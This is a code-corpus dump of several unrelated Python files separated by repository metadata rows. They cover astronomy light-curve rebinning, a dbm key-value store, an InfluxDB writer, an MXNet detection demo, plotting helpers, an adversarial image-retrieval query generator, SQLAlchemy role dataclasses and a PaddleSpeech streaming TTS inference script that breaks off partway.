for t,f,e in zip(BJD_avg,VAL_avg,ERR_avg):
fileout.write('{0:f} {1:f} {2:f} 0 0 -1 \n'.format(t,f,e))
fileout.close()
size_full = np.size(data[:,0])
size_tobereshaped = size_full - size_full % 10
BJD = data[:size_tobereshaped,0]
VAL = data[:size_tobereshaped,1]
BJD_avg = np.mean(BJD.reshape(-1, 10), axis=1)
VAL_avg = np.mean(VAL.reshape(-1, 10), axis=1)
ERR_avg = np.std(VAL.reshape(-1, 10), axis=1)
fileout = open('K2-141_raw_noplanets_10sampled.dat','w')
for t,f,e in zip(BJD_avg,VAL_avg,ERR_avg):
fileout.write('{0:f} {1:f} {2:f} 0 0 -1 \n'.format(t,f,e))
fileout.close()
#create rebinned file
data = np.genfromtxt('K2-141_raw_detrended.csv', delimiter=',', skip_header=1, dtype=np.double)
TIME = data[:,0] + 4833.00000
RAW = data[:,1]
DET = data[:,2]
#create file with raw and normalized curve
fileout = open('K2-141_raw.dat','w')
for t,f in zip(TIME,RAW):
fileout.write('{0:f} {1:f} {2:f} 0 -1 -1 \n'.format(t,f,K2_error_estimate))
fileout.close()
fileout = open('K2-141_detrended.dat','w')
for t,f in zip(TIME,DET):
fileout.write('{0:f} {1:f} {2:f} 0 -1 -1 \n'.format(t,f,K2_error_estimate))
fileout.close()
| 29.115385 | 104 | 0.681638 | 428 | 2,271 | 3.488318 | 0.205607 | 0.013396 | 0.050234 | 0.053583 | 0.680509 | 0.618218 | 0.58205 | 0.58205 | 0.453449 | 0.379772 | 0 | 0.077078 | 0.125936 | 2,271 | 77 | 105 | 29.493506 | 0.675063 | 0.077499 | 0 | 0.377358 | 0 | 0.09434 | 0.165629 | 0.079943 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.037736 | 0 | 0.037736 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6245169cc50a2a9fac70a4cfb8aee3852ee809b1 | 515 | py | Python | pushy/util/localStorage.py | pushy-me/pushy-python | 6dba2c7533f992949d82ae5b2191da7e856f6b07 | [
"Apache-2.0"
] | 1 | 2021-12-15T13:34:19.000Z | 2021-12-15T13:34:19.000Z | pushy/util/localStorage.py | pushy-me/pushy-python | 6dba2c7533f992949d82ae5b2191da7e856f6b07 | [
"Apache-2.0"
] | null | null | null | pushy/util/localStorage.py | pushy-me/pushy-python | 6dba2c7533f992949d82ae5b2191da7e856f6b07 | [
"Apache-2.0"
] | 1 | 2021-12-15T06:04:07.000Z | 2021-12-15T06:04:07.000Z | import dbm
from pathlib import Path
# Make sure 'db' subdirectory exists
Path('db').mkdir(exist_ok=True)
# Open and/or create key value store
db = dbm.open('db/pushy', 'c')
# Getter method
def get(key):
try:
return db[key].decode('utf-8')
# Return null if key doesn't exist
except KeyError:
return None
# Setter method
def set(key, value):
db[key] = value
# Delete method
def delete(key):
try:
del db[key]
except KeyError:
# Do nothing if key doesn't exist
return
| 17.758621 | 38 | 0.654369 | 81 | 515 | 4.148148 | 0.555556 | 0.071429 | 0.059524 | 0.065476 | 0.095238 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002538 | 0.234951 | 515 | 28 | 39 | 18.392857 | 0.850254 | 0.341748 | 0 | 0.25 | 0 | 0 | 0.048338 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1875 | false | 0 | 0.125 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62452dfea77c5218139248e918f29a902f34bc4a | 569 | py | Python | dex/db/influxdb/__init__.py | synw/django-dex | 67ac968427209e4b74b57cfa98d38a33337b024f | [
"MIT"
] | 4 | 2017-08-03T00:48:51.000Z | 2021-03-03T10:36:52.000Z | dex/db/influxdb/__init__.py | synw/django-dex | 67ac968427209e4b74b57cfa98d38a33337b024f | [
"MIT"
] | 1 | 2017-08-26T18:28:47.000Z | 2017-08-26T18:28:47.000Z | dex/db/influxdb/__init__.py | synw/django-dex | 67ac968427209e4b74b57cfa98d38a33337b024f | [
"MIT"
] | 1 | 2019-05-09T00:17:58.000Z | 2019-05-09T00:17:58.000Z | from influxdb import InfluxDBClient
CLI = None
POINTS = []
def init(db):
global CLI
CLI = InfluxDBClient(
db.conf["host"],
db.conf["port"],
db.conf["user"],
db.conf["password"],
db.conf["db"],
)
def write(point, force_save=False):
global CLI
global POINTS
POINTS.append(point)
if len(POINTS) < 100 and force_save is False:
return
try:
CLI.write_points(POINTS, batch_size=1000, time_precision="s")
POINTS = []
except Exception as err:
raise err
return
| 18.354839 | 69 | 0.581722 | 71 | 569 | 4.591549 | 0.56338 | 0.092025 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017632 | 0.302285 | 569 | 30 | 70 | 18.966667 | 0.803526 | 0 | 0 | 0.25 | 0 | 0 | 0.040422 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0.041667 | 0.041667 | 0 | 0.208333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
624768d474ea959287b2ba23c3a80b1311919879 | 6,990 | py | Python | multi_demo.py | ChunGaoY/DSPnet | 8fad61059d85ad0cd1f7790c37b5e0478dccb158 | [
"MIT"
] | 33 | 2018-04-18T06:52:16.000Z | 2021-09-26T20:57:56.000Z | multi_demo.py | ChunGaoY/DSPnet | 8fad61059d85ad0cd1f7790c37b5e0478dccb158 | [
"MIT"
] | 4 | 2018-07-09T07:09:15.000Z | 2020-04-12T12:43:36.000Z | multi_demo.py | liangfu/dspnet | 8fad61059d85ad0cd1f7790c37b5e0478dccb158 | [
"MIT"
] | 10 | 2018-04-19T08:17:01.000Z | 2021-09-26T20:57:57.000Z | import os
os.environ["MXNET_EXAMPLE_SSD_DISABLE_PRE_INSTALLED"]='1'
import argparse
import tools.find_mxnet
import mxnet as mx
import sys
from detect.multitask_detector import Detector
from symbol.multitask_symbol_factory import get_det_symbol, get_seg_symbol, get_multi_symbol
def get_detector(net, prefix, epoch, data_shape, mean_pixels, ctx, num_class,
nms_thresh=0.5, force_nms=True, nms_topk=400):
"""
wrapper for initialize a detector
Parameters:
----------
net : str
test network name
prefix : str
load model prefix
epoch : int
load model epoch
data_shape : int
resize image shape
mean_pixels : tuple (float, float, float)
mean pixel values (R, G, B)
ctx : mx.ctx
running context, mx.cpu() or mx.gpu(?)
num_class : int
number of classes
nms_thresh : float
non-maximum suppression threshold
force_nms : bool
force suppress different categories
"""
if net is not None:
if net.endswith("fcn32s"):
net = get_fcn32s_symbol(net.split("_")[0], data_shape, num_classes=num_class, nms_thresh=nms_thresh,
force_nms=force_nms, nms_topk=nms_topk)
elif net.endswith("fcn16s"):
net = get_fcn16s_symbol(net.split("_")[0], data_shape, num_classes=num_class, nms_thresh=nms_thresh,
force_nms=force_nms, nms_topk=nms_topk)
elif net.endswith("fcn8s"):
net = get_fcn8s_symbol(net.split("_")[0], data_shape, num_classes=num_class, nms_thresh=nms_thresh,
force_nms=force_nms, nms_topk=nms_topk)
############### uncomment the following lines to visualize network ###########################
# dot = mx.viz.plot_network(net, shape={'data':(1,3,512,1024)})
# dot = mx.viz.plot_network(net, shape={'data':(1,3,320,640)})
# dot.view()
detector = Detector(net, prefix, epoch, data_shape, mean_pixels, ctx=ctx)
return detector
def parse_args():
parser = argparse.ArgumentParser(description='Single-shot detection network demo')
parser.add_argument('--network', dest='network', type=str, default='resnet-18_fcn32s',
help='which network to use')
parser.add_argument('--images', dest='images', type=str, default='./data/demo/dog.jpg',
help='run demo with images, use comma to seperate multiple images')
parser.add_argument('--dir', dest='dir', nargs='?',
help='demo image directory, optional', type=str)
parser.add_argument('--ext', dest='extension', help='image extension, optional',
type=str, nargs='?')
parser.add_argument('--epoch', dest='epoch', help='epoch of trained model',
default=0, type=int)
parser.add_argument('--prefix', dest='prefix', help='trained model prefix',
default=os.path.join(os.getcwd(), 'models', 'multitask_'),
type=str)
parser.add_argument('--cpu', dest='cpu', help='(override GPU) use CPU to detect',
action='store_true', default=False)
parser.add_argument('--gpu', dest='gpu_id', type=int, default=0,
help='GPU device id to detect with')
parser.add_argument('--data-shape', dest='data_shape', type=str, default="3,512,1024",
help='set image shape')
parser.add_argument('--mean-r', dest='mean_r', type=float, default=123,
help='red mean value')
parser.add_argument('--mean-g', dest='mean_g', type=float, default=117,
help='green mean value')
parser.add_argument('--mean-b', dest='mean_b', type=float, default=104,
help='blue mean value')
parser.add_argument('--thresh', dest='thresh', type=float, default=0.6,
help='object visualize score threshold, default 0.6')
parser.add_argument('--nms', dest='nms_thresh', type=float, default=0.5,
help='non-maximum suppression threshold, default 0.5')
parser.add_argument('--force', dest='force_nms', type=bool, default=True,
help='force non-maximum suppression on different class')
parser.add_argument('--timer', dest='show_timer', type=bool, default=True,
help='show detection time')
parser.add_argument('--deploy', dest='deploy_net', action='store_true', default=False,
help='Load network from json file, rather than from symbol')
parser.add_argument('--class-names', dest='class_names', type=str,
default='aeroplane, bicycle, bird, boat, bottle, bus, \
car, cat, chair, cow, diningtable, dog, horse, motorbike, \
person, pottedplant, sheep, sofa, train, tvmonitor',
help='string of comma separated names, or text filename')
args = parser.parse_args()
return args
def parse_class_names(class_names):
""" parse # classes and class_names if applicable """
if len(class_names) > 0:
if os.path.isfile(class_names):
# try to open it to read class names
with open(class_names, 'r') as f:
class_names = [l.strip() for l in f.readlines()]
else:
class_names = [c.strip() for c in class_names.split(',')]
for name in class_names:
assert len(name) > 0
else:
raise RuntimeError("No valid class_name provided...")
return class_names
if __name__ == '__main__':
args = parse_args()
if args.cpu:
ctx = mx.cpu()
else:
ctx = mx.gpu(args.gpu_id)
# parse image list
# image_list = [i.strip() for i in args.images.split(',')]
# assert len(image_list) > 0, "No valid image specified to detect"
imgname = args.images
network = None if args.deploy_net else args.network
class_names = parse_class_names(args.class_names)
data_shape = None
if isinstance(args.data_shape, int):
data_shape = 3,args.data_shape,args.data_shape
else:
data_shape = map(lambda x:int(x),args.data_shape.split(","))
assert len(data_shape) == 3 and data_shape[0] == 3
if args.prefix.endswith('_'):
prefix = args.prefix + args.network + '_' + str(data_shape[1])
else:
prefix = args.prefix
# print(network, prefix, args.epoch, data_shape,
# (args.mean_r, args.mean_g, args.mean_b),
# ctx, len(class_names), args.nms_thresh, args.force_nms)
detector = get_detector(network, prefix, args.epoch, data_shape,
(args.mean_r, args.mean_g, args.mean_b),
ctx, len(class_names), args.nms_thresh, args.force_nms)
# run detection
detector.detect_and_visualize(imgname, args.dir, args.extension,
class_names, args.thresh, args.show_timer)
| 46.291391 | 112 | 0.609156 | 903 | 6,990 | 4.535991 | 0.251384 | 0.043945 | 0.074707 | 0.016602 | 0.227539 | 0.173828 | 0.15918 | 0.15918 | 0.15918 | 0.137695 | 0 | 0.014526 | 0.261373 | 6,990 | 150 | 113 | 46.6 | 0.778811 | 0.151216 | 0 | 0.078431 | 0 | 0 | 0.180135 | 0.006749 | 0 | 0 | 0 | 0 | 0.019608 | 1 | 0.029412 | false | 0 | 0.068627 | 0 | 0.127451 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62485e5d3f7ade14edb4bfc1d0fe39849cda19e0 | 2,551 | py | Python | viz.py | all-umass/manifold_spanning_graphs | 236efd18eb673ed20bf585fc5de6e6aa080eed79 | [
"MIT"
] | 3 | 2017-01-15T15:46:21.000Z | 2021-01-02T08:51:48.000Z | viz.py | perimosocordiae/manifold_spanning_graphs | 236efd18eb673ed20bf585fc5de6e6aa080eed79 | [
"MIT"
] | null | null | null | viz.py | perimosocordiae/manifold_spanning_graphs | 236efd18eb673ed20bf585fc5de6e6aa080eed79 | [
"MIT"
] | 4 | 2015-09-18T14:28:20.000Z | 2018-09-29T21:53:32.000Z | import numpy as np
from matplotlib import pyplot
def scatterplot(X, marker='.', title=None, fig=None, ax=None, **kwargs):
'''General plotting function for a set of points X. May be [1-3] dimensional.'''
assert len(X.shape) in (1,2), 'Only valid for 1 or 2-d arrays of points'
assert len(X.shape) == 1 or X.shape[1] in (1,2,3), 'Only valid for [1-3] dimensional points'
is_3d = len(X.shape) == 2 and X.shape[1] == 3
is_1d = len(X.shape) == 1 or X.shape[1] == 1
if ax is None:
if fig is None:
fig = pyplot.gcf()
if is_3d:
from mpl_toolkits.mplot3d import Axes3D
ax = Axes3D(fig)
else:
ax = fig.add_subplot(111)
elif is_3d:
assert hasattr(ax, 'zaxis'), 'Must provide an Axes3D axis'
# Do the plotting
if is_1d:
ax.scatter(X, marker=marker, **kwargs)
elif is_3d:
ax.scatter(X[:,0], X[:,1], X[:,2], marker=marker, **kwargs)
else:
ax.scatter(X[:,0], X[:,1], marker=marker, **kwargs)
if title:
ax.set_title(title)
return pyplot.show
def show_neighbor_graph(X, W, title=None, fig=None, ax=None,
edge_style='r-', vertex_style='o', vertex_colors='b',
vertex_sizes=20, vertex_edgecolor='none'):
'''Plot the neighbor connections between points in a data set.'''
assert X.shape[1] in (2,3), 'can only show neighbor graph for 2d or 3d data'
is_3d = (X.shape[1] == 3)
if ax is None:
if is_3d:
from mpl_toolkits.mplot3d import Axes3D
if fig is None:
fig = pyplot.gcf()
ax = Axes3D(fig)
else:
ax = pyplot.gca()
pairs = np.transpose(np.nonzero(W))
t = X[pairs]
# this uses the 'None trick', to insert discontinuties in the line plot
tX = np.empty((t.shape[0], t.shape[1]+1))
tX[:,:-1] = t[:,:,0]
tX[:,-1] = None
tY = tX.copy()
tY[:,:-1] = t[:,:,1]
if is_3d:
tZ = tX.copy()
tZ[:,:-1] = t[:,:,2]
# needs to be a real array, so we use .ravel() instead of .flat
ax.plot(tX.ravel(), tY.ravel(), tZ.ravel(), edge_style, zorder=1)
if vertex_style is not None:
ax.scatter(X[:,0], X[:,1], X[:,2], marker=vertex_style, zorder=2,
edgecolor=vertex_edgecolor, c=vertex_colors, s=vertex_sizes)
else:
# tX.flat looks like: [x1,x2,NaN, x3,x4,Nan, ...]
ax.plot(tX.flat, tY.flat, edge_style, zorder=1)
if vertex_style is not None:
ax.scatter(X[:,0], X[:,1], marker=vertex_style, zorder=2,
edgecolor=vertex_edgecolor, c=vertex_colors, s=vertex_sizes)
if title:
ax.set_title(title)
return pyplot.show
| 35.430556 | 94 | 0.607213 | 429 | 2,551 | 3.5338 | 0.284382 | 0.03562 | 0.032322 | 0.029024 | 0.414248 | 0.378628 | 0.349604 | 0.306728 | 0.281662 | 0.163588 | 0 | 0.038226 | 0.23089 | 2,551 | 71 | 95 | 35.929577 | 0.734455 | 0.129753 | 0 | 0.47541 | 0 | 0 | 0.075249 | 0 | 0 | 0 | 0 | 0 | 0.065574 | 1 | 0.032787 | false | 0 | 0.065574 | 0 | 0.131148 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6248bbc4cbe43186f9f7f6465992b8eb821afb1c | 3,898 | py | Python | gen_cv_pire.py | SamSweere/CV-PIRE | d857167b3058cb51d10662150c6a4ba3c85f2903 | [
"MIT"
] | null | null | null | gen_cv_pire.py | SamSweere/CV-PIRE | d857167b3058cb51d10662150c6a4ba3c85f2903 | [
"MIT"
] | null | null | null | gen_cv_pire.py | SamSweere/CV-PIRE | d857167b3058cb51d10662150c6a4ba3c85f2903 | [
"MIT"
] | 1 | 2020-01-13T08:43:14.000Z | 2020-01-13T08:43:14.000Z | import os
import argparse
import torch
import torch.nn as nn
import torchvision.models as models
from torch.utils.model_zoo import load_url
from src.gem_init import init_network, ResNetIR
from cv_pire import pert_each_im
parser = argparse.ArgumentParser(description = "Given a neural features extraction model and an image query, generates a adversarial query.")
parser.add_argument("-T", "--iter", type=int, help="Iterative condition, parameter T in the paper.", default="500")
parser.add_argument("-treshold", "--tresh", type=int, help="Treshold for the maximum pixel pertubation.", default="40")
parser.add_argument("-gpu_id", "--gpu", type=int, help="Using GPU or not, cpu please use -1", default="0")
parser.add_argument("-cnnmodel", "--model", help="Pytorch CNN feature extractor which extracts neural features. Now gem and imagenet-res101 available.", default="gem")
parser.add_argument("-in_dir", "--input_dir", help="Directory for original image queries.", default= "./img_input/")
parser.add_argument("-out_dir", "--output_dir", help="Directory for generated adversarial queries.", default="./img_output/")
parser.add_argument("-perception_op", "--p", help="Whether to use perception optimization, function p in the paper.", default=True)
parser.add_argument("-kernelsize", "--kernelsize", type=int, help="Kernel size for the colorvariation calculation.",default="3")
parser.add_argument("-sigma", "--sigma", type=float, help="The standard deviation (sigma) for the gaussian kernel used in the colorvariation calculation. Use a big number to create a uniform kernel", default="1.0")
parser.add_argument("-saveIter", "--saveIter", type=int, help="Save every x iterations, make this the same as T if you only want the last iteration to be saved.",default="100")
args = parser.parse_args()
print("Loading network {}...".format(args.model))
# We use pre-trained GeM from http://cmp.felk.cvut.cz/cnnimageretrieval/
if args.model == "gem":
# download and load GeM model
state = load_url('http://cmp.felk.cvut.cz/cnnimageretrieval/data/networks/retrieval-SfM-120k/retrievalSfM120k-resnet101-gem-b80fb85.pth',
model_dir = './models/')
net_params = {}
net_params['architecture'] = state['meta']['architecture']
net_params['pooling'] = state['meta']['pooling']
net_params['local_whitening'] = state['meta'].get('local_whitening', False)
net_params['regional'] = state['meta'].get('regional', False)
net_params['whitening'] = state['meta'].get('whitening', False)
net_params['mean'] = state['meta']['mean']
net_params['std'] = state['meta']['std']
net_params['pretrained'] = False
net = init_network(net_params)
net.load_state_dict(state['state_dict'])
net.eval()
elif args.model == "imagenet-res101":
net = models.resnet101(pretrained=True)
features = list(net.children())[:-1]
net = ResNetIR(features)
modules=list(net.children())
modules[-2][-1] = torch.nn.AdaptiveAvgPool2d((1, 1))
net=nn.Sequential(*modules)
for p in net.parameters():
p.requires_grad = False
net.eval()
else:
print("do not support other networks yet.")
if args.gpu > -1:
print("Using GPU")
net.cuda()
torch_dev = torch.device('cuda:0')
else:
print("Using CPU")
net.float()
torch_dev = torch.device('cpu')
print("Generating adversarial image query...")
im_list = []
for item in os.listdir(args.input_dir):
try:
if item.split('.')[1] == 'jpg':
im_list.append(item)
except:
pass
for im_name in im_list:
pert_each_im(im_name, model=net, itr=args.iter,
root=args.input_dir, save_dir=args.output_dir, dev=torch_dev, percep_optim=args.p, treshold=args.tresh, kernelsize=args.kernelsize, sigma=args.sigma, saveIter=args.saveIter)
print("Generated adversarial image query have been saved in {}.".format(args.output_dir))
| 41.913978 | 214 | 0.705747 | 547 | 3,898 | 4.917733 | 0.374771 | 0.033457 | 0.063197 | 0.012639 | 0.025279 | 0.025279 | 0 | 0 | 0 | 0 | 0 | 0.013158 | 0.142124 | 3,898 | 92 | 215 | 42.369565 | 0.791268 | 0.025141 | 0 | 0.058824 | 0 | 0.044118 | 0.377239 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.014706 | 0.117647 | 0 | 0.117647 | 0.088235 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
624cea12769ac05db8d1b66c8b40aa1a525da3cf | 1,685 | py | Python | src/sqlalchemy_declarative/role/base.py | DanCardin/sqlalchemy-declarative | e82da0a03235edfbc2348cf65d3d9e1c944ef0d2 | [
"Apache-2.0"
] | null | null | null | src/sqlalchemy_declarative/role/base.py | DanCardin/sqlalchemy-declarative | e82da0a03235edfbc2348cf65d3d9e1c944ef0d2 | [
"Apache-2.0"
] | null | null | null | src/sqlalchemy_declarative/role/base.py | DanCardin/sqlalchemy-declarative | e82da0a03235edfbc2348cf65d3d9e1c944ef0d2 | [
"Apache-2.0"
] | null | null | null | from dataclasses import astuple, dataclass, field, fields
from datetime import datetime
from typing import List, Optional, Tuple, Union
@dataclass(frozen=True)
class Role:
"""
postgres: https://www.postgresql.org/docs/current/sql-createrole.html
"""
name: str
superuser: Optional[bool] = None
createdb: Optional[bool] = None
createrole: Optional[bool] = None
inherit: Optional[bool] = None
login: Optional[bool] = None
replication: Optional[bool] = None
bypass_rls: Optional[bool] = None
connection_limit: Optional[int] = None
in_roles: Optional[List[str]] = None
@property
def has_option(self):
_, *options = astuple(self)
return any(o is not None for o in options)
@property
def options(self):
for f in fields(self):
if f.name == "name":
continue
value = getattr(self, f.name)
if value is None:
continue
yield f.name, value
@dataclass(frozen=True)
class User(Role):
password: Optional[str] = None
valid_until: Optional[datetime] = None
@dataclass
class Roles:
roles: List[Role] = field(default_factory=list)
ignore_unspecified: bool = False
@classmethod
def options(cls, ignore_unspecified=False):
return cls(ignore_unspecified=ignore_unspecified)
def __iter__(self):
for role in self.roles:
yield role
def are(self, *roles: Tuple[Union[Role, str]]):
return self.__class__(
roles=[role if isinstance(role, Role) else Role(role) for role in roles],
ignore_unspecified=self.ignore_unspecified,
)
| 24.779412 | 85 | 0.636795 | 202 | 1,685 | 5.207921 | 0.376238 | 0.079848 | 0.106464 | 0.045627 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.265282 | 1,685 | 67 | 86 | 25.149254 | 0.849758 | 0.04095 | 0 | 0.12766 | 0 | 0 | 0.0025 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.106383 | false | 0.042553 | 0.06383 | 0.042553 | 0.595745 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
624defc6a938e443839be55147c520da9febc697 | 9,019 | py | Python | paddlespeech/t2s/exps/inference_streaming.py | SmileGoat/PaddleSpeech | 67994cb8a3f0d3c65446ef9560c69025d6d9a0ef | [
"Apache-2.0"
] | 2 | 2021-11-29T09:02:20.000Z | 2022-02-10T09:30:00.000Z | paddlespeech/t2s/exps/inference_streaming.py | SmileGoat/PaddleSpeech | 67994cb8a3f0d3c65446ef9560c69025d6d9a0ef | [
"Apache-2.0"
] | null | null | null | paddlespeech/t2s/exps/inference_streaming.py | SmileGoat/PaddleSpeech | 67994cb8a3f0d3c65446ef9560c69025d6d9a0ef | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
from pathlib import Path
import numpy as np
import paddle
import soundfile as sf
from timer import timer
from paddlespeech.t2s.exps.syn_utils import denorm
from paddlespeech.t2s.exps.syn_utils import get_am_sublayer_output
from paddlespeech.t2s.exps.syn_utils import get_chunks
from paddlespeech.t2s.exps.syn_utils import get_frontend
from paddlespeech.t2s.exps.syn_utils import get_predictor
from paddlespeech.t2s.exps.syn_utils import get_sentences
from paddlespeech.t2s.exps.syn_utils import get_streaming_am_output
from paddlespeech.t2s.exps.syn_utils import get_voc_output
from paddlespeech.t2s.utils import str2bool
def parse_args():
parser = argparse.ArgumentParser(
description="Paddle Infernce with acoustic model & vocoder.")
# acoustic model
parser.add_argument(
'--am',
type=str,
default='fastspeech2_csmsc',
choices=['fastspeech2_csmsc'],
help='Choose acoustic model type of tts task.')
parser.add_argument(
"--am_stat",
type=str,
default=None,
help="mean and standard deviation used to normalize spectrogram when training acoustic model."
)
parser.add_argument(
"--phones_dict", type=str, default=None, help="phone vocabulary file.")
parser.add_argument(
"--tones_dict", type=str, default=None, help="tone vocabulary file.")
parser.add_argument(
"--speaker_dict", type=str, default=None, help="speaker id map file.")
parser.add_argument(
'--spk_id',
type=int,
default=0,
help='spk id for multi speaker acoustic model')
# voc
parser.add_argument(
'--voc',
type=str,
default='pwgan_csmsc',
choices=['pwgan_csmsc', 'mb_melgan_csmsc', 'hifigan_csmsc'],
help='Choose vocoder type of tts task.')
# other
parser.add_argument(
'--lang',
type=str,
default='zh',
help='Choose model language. zh or en')
parser.add_argument(
"--text",
type=str,
help="text to synthesize, a 'utt_id sentence' pair per line")
parser.add_argument(
"--inference_dir", type=str, help="dir to save inference models")
parser.add_argument("--output_dir", type=str, help="output dir")
# inference
parser.add_argument(
"--device",
default="gpu",
choices=["gpu", "cpu"],
help="Device selected for inference.", )
# streaming related
parser.add_argument(
"--am_streaming",
type=str2bool,
default=False,
help="whether use streaming acoustic model")
parser.add_argument(
"--block_size", type=int, default=42, help="block size of am streaming")
parser.add_argument(
"--pad_size", type=int, default=12, help="pad size of am streaming")
args, _ = parser.parse_known_args()
return args
# only inference for models trained with csmsc now
def main():
args = parse_args()
paddle.set_device(args.device)
# frontend
frontend = get_frontend(
lang=args.lang,
phones_dict=args.phones_dict,
tones_dict=args.tones_dict)
# am_predictor
am_encoder_infer_predictor = get_predictor(
model_dir=args.inference_dir,
model_file=args.am + "_am_encoder_infer" + ".pdmodel",
params_file=args.am + "_am_encoder_infer" + ".pdiparams",
device=args.device)
am_decoder_predictor = get_predictor(
model_dir=args.inference_dir,
model_file=args.am + "_am_decoder" + ".pdmodel",
params_file=args.am + "_am_decoder" + ".pdiparams",
device=args.device)
am_postnet_predictor = get_predictor(
model_dir=args.inference_dir,
model_file=args.am + "_am_postnet" + ".pdmodel",
params_file=args.am + "_am_postnet" + ".pdiparams",
device=args.device)
am_mu, am_std = np.load(args.am_stat)
# model: {model_name}_{dataset}
am_dataset = args.am[args.am.rindex('_') + 1:]
# voc_predictor
voc_predictor = get_predictor(
model_dir=args.inference_dir,
model_file=args.voc + ".pdmodel",
params_file=args.voc + ".pdiparams",
device=args.device)
output_dir = Path(args.output_dir)
output_dir.mkdir(parents=True, exist_ok=True)
sentences = get_sentences(text_file=args.text, lang=args.lang)
merge_sentences = True
fs = 24000 if am_dataset != 'ljspeech' else 22050
# warmup
for utt_id, sentence in sentences[:3]:
with timer() as t:
normalized_mel = get_streaming_am_output(
input=sentence,
am_encoder_infer_predictor=am_encoder_infer_predictor,
am_decoder_predictor=am_decoder_predictor,
am_postnet_predictor=am_postnet_predictor,
frontend=frontend,
lang=args.lang,
merge_sentences=merge_sentences, )
mel = denorm(normalized_mel, am_mu, am_std)
wav = get_voc_output(voc_predictor=voc_predictor, input=mel)
speed = wav.size / t.elapse
rtf = fs / speed
print(
f"{utt_id}, mel: {mel.shape}, wave: {wav.shape}, time: {t.elapse}s, Hz: {speed}, RTF: {rtf}."
)
print("warm up done!")
N = 0
T = 0
block_size = args.block_size
pad_size = args.pad_size
get_tone_ids = False
for utt_id, sentence in sentences:
with timer() as t:
# frontend
if args.lang == 'zh':
input_ids = frontend.get_input_ids(
sentence,
merge_sentences=merge_sentences,
get_tone_ids=get_tone_ids)
phone_ids = input_ids["phone_ids"]
else:
print("lang should be 'zh' here!")
phones = phone_ids[0].numpy()
# acoustic model
orig_hs = get_am_sublayer_output(
am_encoder_infer_predictor, input=phones)
if args.am_streaming:
hss = get_chunks(orig_hs, block_size, pad_size)
chunk_num = len(hss)
mel_list = []
for i, hs in enumerate(hss):
am_decoder_output = get_am_sublayer_output(
am_decoder_predictor, input=hs)
am_postnet_output = get_am_sublayer_output(
am_postnet_predictor,
input=np.transpose(am_decoder_output, (0, 2, 1)))
am_output_data = am_decoder_output + np.transpose(
am_postnet_output, (0, 2, 1))
normalized_mel = am_output_data[0]
sub_mel = denorm(normalized_mel, am_mu, am_std)
# clip output part of pad
if i == 0:
sub_mel = sub_mel[:-pad_size]
elif i == chunk_num - 1:
# 最后一块的右侧一定没有 pad 够
sub_mel = sub_mel[pad_size:]
else:
# 倒数几块的右侧也可能没有 pad 够
sub_mel = sub_mel[pad_size:(block_size + pad_size) -
sub_mel.shape[0]]
mel_list.append(sub_mel)
mel = np.concatenate(mel_list, axis=0)
else:
am_decoder_output = get_am_sublayer_output(
am_decoder_predictor, input=orig_hs)
am_postnet_output = get_am_sublayer_output(
am_postnet_predictor,
input=np.transpose(am_decoder_output, (0, 2, 1)))
am_output_data = am_decoder_output + np.transpose(
am_postnet_output, (0, 2, 1))
normalized_mel = am_output_data[0]
mel = denorm(normalized_mel, am_mu, am_std)
# vocoder
